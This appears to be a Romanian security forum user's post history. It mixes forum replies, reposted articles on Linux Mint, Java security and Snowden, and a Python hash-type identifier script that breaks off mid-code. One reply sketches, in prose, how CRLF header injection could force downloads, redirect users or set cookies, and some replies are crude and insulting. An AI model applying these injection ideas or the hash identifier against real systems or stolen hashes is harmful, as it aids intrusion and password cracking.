Nytro

coolbyte : Asteapta cateva zile. Nu platesc doar eu, cei din staff platim, dar costa ceva. Revenim cu mai multe informatii zilele urmatoare.

https://rstforums.com/proiecte/DK_v3.3.zip E sursa, se poate compila. Cand ajung acasa.

Pare sa fie o aceeasi problema ca si CRLF-urile de la formularele de email (SMTP si HTTP folosesc acelasi delimitator de headere, \r\n): CRLF Injection (CRLF Injection attacks and HTTP Response Splitting - Acunetix) doar cu un nume mai trendy. Sau ii putem zice HTTP Response Splitting, mai generic (HTTP response splitting - Wikipedia, the free encyclopedia). In orice caz, este XSS (daca nu sunt filtrate datele). In loc sa generezi ca raspuns un alt set de headere HTTP, mai bine generezi tu un cod HTML/JS care face cine stie ce prostii. Din acest motiv, sigur, e vulnerabilitate. Dar uite niste idei: - poti pune header de descarcare de fisier: "Content-Disposition: attachment; filename=MyFileName.ext" si poti forta descarcarea unui fisier, care provine dintr-o sursa "sigura" - poti pune Location catre ce vrei tu, deci ai URL redirection sau cum va place sa ii ziceti, cu "Location" - poti seta diverse cookie-uri cu "Set-Cookie" Legat strict de ce zici tu, de acel "Cross User Defacement" adica de posibilitatea de a raspunde cu 2 (sau mai multe) raspunsuril HTTP, nu e o problema de web security: 1. Ai nevoie de acea "shared connection" care in practica nu cred ca e foarte comun 2. Este o problema, DAR este o problema in porcaria de server de proxy cache, NU in aplicatia web Cross-user defacement si web cache poisoning sunt probleme in servere de proxy cache. Da, atat la nivel teoretic cat si la nivel practic, nu este in regula sa existe posibilitatea de a modifica headerele de raspuns. E cam urat de exploatat dar tot o problema ramane, insa nu una foarte periculoasa. Voi vota ca "da", ca e o problema de securitate, dar una "Low", nu foarte periculoasa. Cum altfel ai putea exploata asa ceva? Legat de raspunsul lor, cred ca nu au inteles exact despre ce e vorba. Mie numele (Cross User Defacement) mi se pare o porcarie gay.

3 warn-uri care au rezultat in 3 ban-uri. Vorbiti mult si prost.

[h=2]Linux Mint 15 “Olivia” KDE released![/h]Written by Clem on Sunday, July 21st, 2013 The team is proud to announce the release of Linux Mint 15 “Olivia” KDE. Linux Mint 15 Olivia KDE is a vibrant, innovative, advanced, modern looking and full-featured desktop environment. This edition features all the improvements from the latest Linux Mint release on top of KDE 4.10. New features at a glance: KDE 4.10 MDM Software Sources Driver Manager Software Manager System Improvements Artwork Improvements Upstream Components For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 15 KDE“. Important info: PAE required for 32-bit ISOs EFI support Make sure to read the “Release Notes” to be aware of important info or known issues related to this release. System requirements: x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors). 1GB RAM 8 GB of disk space Graphics card capable of 1024×768 resolution DVD drive or USB port Upgrade instructions: To upgrade from a previous version of Linux Mint follow these instructions. To upgrade from the RC release, simply apply any level 1 and 2 updates (if any) available in the Update Manager. Download: Md5 sum: 32-bit: 72fe1cfd477b074a1849dda34430b4b7 64-bit: 38dd24371ceafe34915eb5cb350217c7 Torrents: 32-bit 64-bit HTTP Mirrors for the 32-bit DVD ISO: Argentina Cooperativa Telefonica de Villa Gobernador Galvez Ltda. Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Australia Yes Optus Mirror Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club Czech Republic Ignum, s.r.o. Denmark Development Group Denmark Denmark klid.dk France GoPotato France Gwendal Le Bihan France IRCAM France Nouknouk France Ordimatic France RTS Informatique Germany Artfiles Germany Copahost Germany FH Aachen Germany GWDG Germany killerhorse.eu Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf India Honesty Net Solutions Ireland HEAnet Israel Israel Internet Association Italy GARR Lithuania Atviras kodas Lietuvai Luxembourg root S.A. Malaysia Universiti Teknologi Malaysia Open Source Mirror Netherlands NLUUG Netherlands Triple IT New Zealand University of Canterbury New Zealand Xnet Norway Communica Poland ICM – University of Warsaw Portugal CeSIUM – Universidade do Minho Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore 0x.sg Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Korea KAIST South Korea NeowizGames corp Sri Lanka Lanka Education and Research Network Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Thailand adminbannok.com Turkey Linux Kullanicilari Dernegi Ukraine OSDN.Org.UA United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA James Madison University USA Linux Freedom USA MetroCast Cablevision USA mirrorcatalogs.com USA Nexcess USA PSGNet USA Secution, LLC. USA University of Maryland, College Park Vietnam FPT Telecom HTTP Mirrors for the 64-bit DVD ISO: Argentina Cooperativa Telefonica de Villa Gobernador Galvez Ltda. Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Australia Yes Optus Mirror Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club Czech Republic Ignum, s.r.o. Denmark Development Group Denmark Denmark klid.dk France GoPotato France Gwendal Le Bihan France IRCAM France Nouknouk France Ordimatic France RTS Informatique Germany Artfiles Germany Copahost Germany FH Aachen Germany GWDG Germany killerhorse.eu Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf India Honesty Net Solutions Ireland HEAnet Israel Israel Internet Association Italy GARR Lithuania Atviras kodas Lietuvai Luxembourg root S.A. Malaysia Universiti Teknologi Malaysia Open Source Mirror Netherlands NLUUG Netherlands Triple IT New Zealand University of Canterbury New Zealand Xnet Norway Communica Poland ICM – University of Warsaw Portugal CeSIUM – Universidade do Minho Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore 0x.sg Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Korea KAIST South Korea NeowizGames corp Sri Lanka Lanka Education and Research Network Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Thailand adminbannok.com Turkey Linux Kullanicilari Dernegi Ukraine OSDN.Org.UA United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA James Madison University USA Linux Freedom USA MetroCast Cablevision USA mirrorcatalogs.com USA Nexcess USA PSGNet USA Secution, LLC. USA University of Maryland, College Park Vietnam FPT Telecom Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun with this new release! Sursa: The Linux Mint Blog

Relax! Java is OK – and Easy to Secure July 17, 2013 / Simon Crosby It’s become cool, particularly among those that sport Macs, to scoff at Java and pretend that it’s an anachronism that the world doesn’t need. Perhaps it’s a re-enactment by the Apple faithful of Steve Jobs’s disdain for Flash, spurred by Apple’s removal of Java as a default plugin for Safari after Apple itself was compromised by a Java-based attack. After all, who can resist getting in a dig at Larry Ellison’s expense? But the fever pitch around Java is bigger than that. It has grown to the point that the US DHS warned users to disable client-side Java. Talk about shouting into the wind: Java is here to stay – approximately forever. And it can easily be made completely secure. If you need to ask why Java is needed, then you do not work in a real enterprise setting. Last week I visited a leading manufacturer of heavy machinery, whose innovative designs are crucial to its success. It is being heavily targeted as a result. Like many organizations for which IT is not the focus of the business, the IT operations team is stretched thin. They do their best to keep up. The company is being actively attacked using Java as a vector because they are stuck with an old version: They use Oracle R11 as their ERP system, which apparently (I haven’t been able to verify this) requires the client to use Java 1.5.0_17. Upgrading the ERP system would be disruptive, expensive and complex, and banning client side Java is not an option – everyone, from Finance to Engineering, has to use the system. No matter how you look at it, the problem isn’t Java. Nor is it the “You” in “User”. Unlike the countless failed attempts to train users not to click on “seemingly unsafe” links or files, I’m going to assert that user training will never succeed since the attacker is always a step ahead of the trainer. (Unpatched) Java, and un-trainable users are with us to stay. What is the problem? Complex application and OS software environments are vulnerable because they offer a huge attack surface. Java has been successfully targeted of late because it is a classic example of a complex software environment, and because of its ubiquity and platform independence. Java meets the economic needs of malware writers: One can target a massive number of deployed systems with one piece of malware. The response of the security and OS vendors is at best, sad. The security industry has nothing more useful to offer than advice on how to un-install, or update the Java plugin. Apple removed Java from Safari last October, and Microsoft FixIt now blocks Java from IE. For its part, Oracle has repeatedly promised to fix Java once and for all, and a recent blog is telling (the highlights are mine): In JDK 7.2, Oracle added enhanced security warnings before executing applets with an old Java runtime… In JDK 7.10, Oracle introduced a security slider configuration option, …. Further, with the release of JDK 7.21, Oracle introduced the following: … With this update … users can prevent the execution of any applets if they are not signed. The default plug-in security settings were changed to further discourage the execution of unsigned or self-signed applets. This change is likely to impact most Java users, and Oracle urges organizations …to sign [their] Applets While Java provides the ability to check the validity of signed certificates … the feature is not enabled by default because of a potential negative performance impact. …In the interim, we have improved our static blacklisting to a dynamic blacklisting mechanism … The Oracle “solution” appears to be “hope the user does the right thing”, “make Java unusable”, and “when all else fails, try blacklisting”. Depending on the user is a bad idea. Making Java unusable is a terrible response, both for Oracle and for its customers. Moreover banning or disabling Java doesn’t address the root of the problem. Blacklisting is an article of faith for the AV vendors, but I think we all recognize that its time has come and gone. A Future Proof Architecture There is a way out of this mess that enables Today’s vulnerable applications & plugins (Flash, Java, Silverlight, Chrome, Firefox, IE, Word, Powerpoint, Excel, PDF, media etc) to run as intended by the vendor New mobile-centric, cloud based applications for consumers or enterprises, to deliver a user experience that fully empowers the user, and With absolute security. The way out is Bromium vSentry. We use use hardware isolation on a per-task basis - to protect the system from every attack. When the next zero day comes along, the attacker will be unable to steal any information or gain access to the corporate network. Moreover, the attacker and all persisted state will be simply discarded as soon as the user closes the task window. No remediation. No change to the applications or to the end user experience. And if the endpoint is attacked, Bromium LAVA will provide live attack visualization, with complete forensic analysis – delivered instantly to the SOC. Check out our new Safely Use Java Apps page to learn more. Sursa: Relax! Java is OK – and Easy to Secure | A Collection of Bromides on Infrastructure

Uitati-va la voi inainte de a-i critica pe ceilalti, ca nu fac nimic. Ganditi-va asa: "Eu ce cacat am facut in ultimii 2-3 ani de cand sunt pe acest forum?" Daca raspunsul e: "Uite, am facut 2 proiecte, am scris cateva sute de linii de cod, am citit 3 tutoriale, am ajutat cativa oameni sa isi rezolve problemele", sunteti pe drumul cel bun. Daca raspunsul e: "Pai am dat la laba pana mi-am bagat mana in ghips, am injurat 200 de oameni ca nu sunt de acord cu mine si consider ca sunt al dracu de destept, am invatat multe de la Nora pentru mama", ar trebui sa va puneti cateva intrebari.

Frumos

C++ SAU Java? Alege. Pentru C++, carti "fizice", dar pe care le gasesti si online: - C++ manual complet, Herbert Schildt - C++ pentru incepatori, vol. I si II, Liviu Negrescu - Totul despre C si C++, Kris Jamsa Pentru Java: - Java de la 0 la expert Vezi la biblioteci.

Edward Snowden Is No Traitor Posted By Philip Giraldi On July 16, 2013 @ 1:18 am There are a number of narratives being floated by the usual suspects to attempt to demonstrate that Edward Snowden is a traitor who has betrayed secrets vital to the security of the United States. All the arguments being made are essentially without merit. Snowden has undeniably violated his agreement to protect classified information, which is a crime. But in reality, he has revealed only one actual secret that matters, which is the United States government’s serial violation of the Fourth Amendment to the Constitution through its collection of personal information on millions of innocent American citizens without any probable cause or search warrant. That makes Snowden a whistleblower, as he is exposing illegal activity on the part of the federal government. The damage he has inflicted is not against U.S. national security but rather on the politicians and senior bureaucrats who ordered, managed, condoned, and concealed the illegal activity. First and foremost among the accusations is the treason claim being advanced [1] by such legal experts as former Vice President Dick Cheney, Speaker of the House John Boehner, and [2] Senator Dianne Feinstein. The critics are saying that Snowden has committed treason because he has revealed U.S. intelligence capabilities to groups like al-Qaeda, with which the United States is at war. Treason is, in fact, the only crime that is specifically named and described in the Constitution, in Article III: “Treason against the United States, shall consist only in levying War against them, or in adhering to their Enemies, giving them Aid and Comfort.” Whether Washington is actually at war with al-Qaeda is, of course, debatable since there has been no declaration of war by Congress as required by Article I of the Constitution. Congress has, however, passed legislation, including the Authorization for Use of Military Force, empowering the President to employ all necessary force against al-Qaeda and “associated” groups; this is what Cheney and the others are relying on to establish a state of war. But even accepting the somewhat fast and loose standard for being at war, it is difficult to discern where Snowden has been supporting the al-Qaeda and “associated groups” enemy. Snowden has had no contact with al-Qaeda and he has not provided them with any classified information. Nor has he ever spoken up on their behalf, given them advice, or supported in any way their activities directed against the United States. The fallback argument that Snowden has alerted terrorists to the fact that Washington is able to read their emails and listen in on their phone conversations—enabling them to change their methods [3] of communication—is hardly worth considering, as groups like al-Qaeda have long since figured that out. Osama bin Laden, a graduate in engineering, repeatedly warned his followers not to use phones or the Internet, and he himself communicated only using live couriers. His awareness of U.S. technical capabilities was such that he would wear a cowboy hat [4] when out in the courtyard of his villa to make it impossible for him to be identified by hovering drones and surveillance satellites. Attempts to stretch the treason argument still further by claiming that Snowden has provided classified information to Russia and China are equally wrong-headed, as the U.S. has full and normally friendly diplomatic relations with both Moscow and Beijing. Both are major trading partners. Washington is not at war with either nation and never has been apart from a brief and limited intervention in the Russian Civil War in 1918. Nor is there any evidence that Snowden passed any material directly to either country’s government or that he has any connection to their intelligence services. Then there is the broader “national security” argument. It goes something like this: Washington will no longer be able to spy on enemies and competitors in the world because Snowden has revealed [5] the sources and methods used by the NSA to do so. Everyone will change their methods of communication, and the United States will be both blind and clueless. Well, one might argue that the White House has been clueless for at least 12 years, but the fact is that the technology and techniques employed by NSA are not exactly secret. Any reasonably well educated telecommunications engineer can tell you exactly what is being done, which means the Russians, Chinese, British, Germans, Israelis, and just about everyone else who has an interest is fully aware of what the capabilities of the United States are in a technical sense. This is why they change their diplomatic and military communications codes on a regular basis and why their civilian telecommunications systems have software that detects hacking by organizations like NSA. Foreign nations also know that what distinguishes the NSA telecommunications interception program is the enormous scale of the dedicated resources in terms of computers and personnel, which permit real time accessing of billions of pieces of information. NSA also benefits from the ability to tie into communications hubs located in the continental United States or that are indirectly accessible, permitting the U.S. government to acquire streams of data directly. The intelligence community is also able to obtain both private data and backdoor access to information through internet, social networking, and computer software companies, the largest of which are American. Anyone interested in more detail on how the NSA operates and what it is capable of should read Jim Bamford’s excellent books [6] on the subject. The NSA’s capabilities, though highly classified, have long been known to many in the intelligence community. In 2007, I described [7] the Bush administration’s drive to broaden the NSA’s activities, noting that The president is clearly seeking open-ended authority to intercept communications without any due process, and he apparently intends to do so in the United States… House Republican leader John Boehner (OH), citing 9/11, has described the White House proposal as a necessary step to ‘break down bureaucratic impediments to intelligence collection and analysis.’ It is not at all clear how unlimited access to currently protected personal information that is already accessible through an oversight procedure would do that. ‘Modernizing’ FISA would enable the government to operate without any restraint. Is that what Boehner actually means? It was clear to me that in 2007 Washington already possessed the technical capability to greatly increase its interception of communications networks, but I was wrong in my belief that the government had actually been somewhat restrained by legal and privacy concerns. Operating widely in a permissive extralegal environment had already started [8] six years before, shortly after 9/11, under the auspices of the Patriot Act and the Authorization for Use of Military Force. The White House’s colossal data mining operation has now been exposed by Edward Snowden, and the American people have discovered that they have been scrutinized by Washington far beyond any level that they would have imagined possible. Many foreign nations have also now realized that the scope of U.S. spying exceeds any reasonable standard of behavior, so much so that if there are any bombshells [9] remaining in the documents taken by Snowden they would most likely relate to the specific targets of overseas espionage. Here in the United States, it remains to be seen whether anyone actually cares enough to do something about the illegal activity while being bombarded with the false claims [10] that the out of control surveillance program “has kept us safe.” It is interesting to observe in passing that the revelations derived from Snowden’s whistleblowing strongly suggest that the hippies and other counter-culture types who, back in the 1960s, protested that the government could not be trusted actually had it right all along. Philip Giraldi, a former CIA officer, is executive director of the Council for the National Interest. Sursa: The American Conservative

[h=2]Hash Detector Tool[/h] Since 2009 when I wrote: " The string Decoding Process" (published by hakin9 magazine) I use crafted tools to automatically decode strings (some of them have been published on this blog). Decoding strings results pretty hard especially nowadays where many encoding algorithms are commonly used over planty "daily life tools". Understanding what encoding we are facing becomes really important if we are analyzing Hashing. Let's assume we 've just got a file including hundreds of different hash strings, how to identify what kind of hashing algorithm have been used ? Having a list o hashes, that potentially could "hide" passwords or important data, having the power of a bruteforce machine and the right tools to attack the hash list without knowing what algorithm have been used could be pretty nesty for attackers. Indeed attackers might have difficult time in attacking hashes without knowing what is the generation algorithm. Surfing on this "painful wave" I decided to share a pretty python code that helped me out in solving this specific problem. The script can be downloaded here (pastebin). The following image shows how simple the script is, and how could be really easy to update it within new hashing algorithms. If you are planning to add new features to the script, please give me the diff file, so that we can create a more generic tool able to detect as many different hashing algorithms as possible. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]HashFinder.py (click to enlarge)[/TD] [/TR] [/TABLE] The script is quite modular and easy to update. What you need to to is to add your new hashing function within its own identifier into the "algorithms" array (lets see the following image). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Algorithms array list: easy to expand (click to enlarge)[/TD] [/TR] [/TABLE] After having filled up the "algorithms" array, you need to add the new function which finds out if the string you are processing might be generated (or not) from the hash algorithm you 've just "declared" in the "algorithms" array. The following image shows to you some examples already implemented. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Function that perform the detection (click to enlarge)[/TD] [/TR] [/TABLE] Finally, in a very quick'n dirty way you want to process the input string by adding the generated function to the main flow. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Adding functions to control flow (click to enlarge)[/TD] [/TR] [/TABLE] Hope it could be useful to everybody, enjoy your new hash detector tool ! #!/usr/bin/env python logo=''' ######################################################################### # modified, adapted and encreased for www.marcoramilli.blogspot.com # #########################################################################''' algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} # hash.islower() minusculas # hash.isdigit() numerico # hash.isalpha() letras # hash.isalnum() alfanumerico def CRC16(): hs='4607' if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101020") def CRC16CCITT(): hs='3d08' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101040") def FCS16(): hs='0e5b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("101060") def CRC32(): hs='b33fd057' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102040") def ADLER32(): hs='0607cb42' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102020") def CRC32B(): hs='b764a0d9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102060") def XOR32(): hs='0000003f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("102080") def GHash323(): hs='80000000' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103040") def GHash325(): hs='85318985' if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: jerar.append("103020") def DESUnix(): hs='ZiY8YtDKXJwYQ' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: jerar.append("104020") def MD5Half(): hs='ae11fd697ec92c7c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105060") def MD5Middle(): hs='7ec92c7c98de3fac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105040") def MySQL(): hs='63cea4673fd25f46' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("105020") def DomainCachedCredentials(): hs='f42005ec1afe77967cbc83dce1b4d714' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106025") def Haval128(): hs='d6e3ec49aa0f138a619f27609022df10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106160") def Haval128HMAC(): hs='3ce8b0ffd75bc240fc7d967729cd6637' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106165") def MD2(): hs='08bbef4754d98806c373f2cd7d9a43c4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106060") def MD2HMAC(): hs='4b61b72ead2b0eb0fa3b8a56556a6dca' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106120") def MD4(): hs='a2acde400e61410e79dacbdfc3413151' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106040") def MD4HMAC(): hs='6be20b66f2211fe937294c1c95d1cd4f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106100") def MD5(): hs='ae11fd697ec92c7c98de3fac23aba525' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106020") def MD5HMAC(): hs='d57e43d2c7e397bf788f66541d6fdef9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106080") def MD5HMACWordpress(): hs='3f47886719268dfa83468630948228f6' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106140") def NTLM(): hs='cc348bace876ea440a28ddaeb9fd3550' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106029") def RAdminv2x(): hs='baea31c728cbf0cd548476aa687add4b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106027") def RipeMD128(): hs='4985351cd74aff0abc5a75a0c8a54115' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106180") def RipeMD128HMAC(): hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106185") def SNEFRU128(): hs='4fb58702b617ac4f7ca87ec77b93da8a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106200") def SNEFRU128HMAC(): hs='59b2b9dcc7a9a7d089cecf1b83520350' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106205") def Tiger128(): hs='c086184486ec6388ff81ec9f23528727' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106220") def Tiger128HMAC(): hs='c87032009e7c4b2ea27eb6f99723454b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106225") def md5passsalt(): hs='5634cc3b922578434d6e9342ff5913f7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106240") def md5saltmd5pass(): hs='245c5763b95ba42d4b02d44bbcd916f1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106260") def md5saltpass(): hs='22cc5ce1a1ef747cd3fa06106c148dfa' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106280") def md5saltpasssalt(): hs='469e9cdcaff745460595a7a386c4db0c' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106300") def md5saltpassusername(): hs='9ae20f88189f6e3a62711608ddb6f5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106320") def md5saltmd5pass(): hs='aca2a052962b2564027ee62933d2382f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106340") def md5saltmd5passsalt(): hs='de0237dc03a8efdf6552fbe7788b2fdd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106360") def md5saltmd5passsalt(): hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106380") def md5saltmd5saltpass(): hs='d8f3b3f004d387086aae24326b575b23' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106400") def md5saltmd5md5passsalt(): hs='81f181454e23319779b03d74d062b1a2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106420") def md5username0pass(): hs='e44a60f8f2106492ae16581c91edb3ba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106440") def md5usernameLFpass(): hs='654741780db415732eaee12b1b909119' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106460") def md5usernamemd5passsalt(): hs='954ac5505fd1843bbb97d1b2cda0b98f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 